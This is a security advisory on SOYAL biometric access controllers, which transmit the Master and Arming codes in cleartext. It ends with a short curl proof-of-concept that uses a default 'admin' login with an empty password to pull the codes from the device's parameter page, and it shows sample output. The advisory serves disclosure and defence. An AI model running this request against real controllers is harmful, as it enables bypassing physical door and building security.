SOYAL Biometric Access Control System 5.0 Master Code Disclosure Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controller's Programming mode and bypass physical security controls in place. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5630 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php 25.01.2021 -- $ curl 'http://192.168.1.1/CtrlParam.htm' \ -H 'Authorization: Basic YWRtaW46' | \ grep -ni -B1 'masterCode\|armCode' <td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td> <td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr> <td>Arming Code (4 Digital) </td> <td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>